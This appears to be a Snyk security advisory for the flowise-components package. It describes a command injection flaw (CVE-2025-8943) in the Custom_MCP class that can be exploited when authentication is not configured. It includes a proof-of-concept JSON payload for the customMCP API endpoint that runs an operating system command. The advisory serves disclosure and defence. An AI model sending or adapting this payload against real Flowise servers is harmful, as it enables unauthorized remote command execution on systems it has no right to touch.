Command Injection Affecting flowise-components package, versions >=0.0.0


Severity

Recommended
0.0
critical
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

EPSS
0.06% (19th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Command Injection vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-FLOWISECOMPONENTS-11953677
  • published17 Aug 2025
  • disclosed14 Aug 2025
  • creditUnknown

Introduced: 14 Aug 2025

NewCVE-2025-8943  (opens in a new tab)
CWE-78  (opens in a new tab)

How to fix?

There is no fixed version for flowise-components.

Overview

flowise-components is a Flowiseai Components

Affected versions of this package are vulnerable to Command Injection via the Custom_MCP class. An attacker can gain unauthorized remote access and execute arbitrary operating system commands by sending crafted requests over the network. This is only exploitable if authentication is not explicitly configured.

PoC

Send the following payload to the node-load-method/customMCP API endpoint:

{
    "inputs":
    {
        "mcpServerConfig":
        {
            "command": "touch",
            "args":
            [
                "/tmp/yofitofi"
            ]
        }
    },
    "loadMethod": "listActions"
}

References

CVSS Base Scores

version 4.0
version 3.1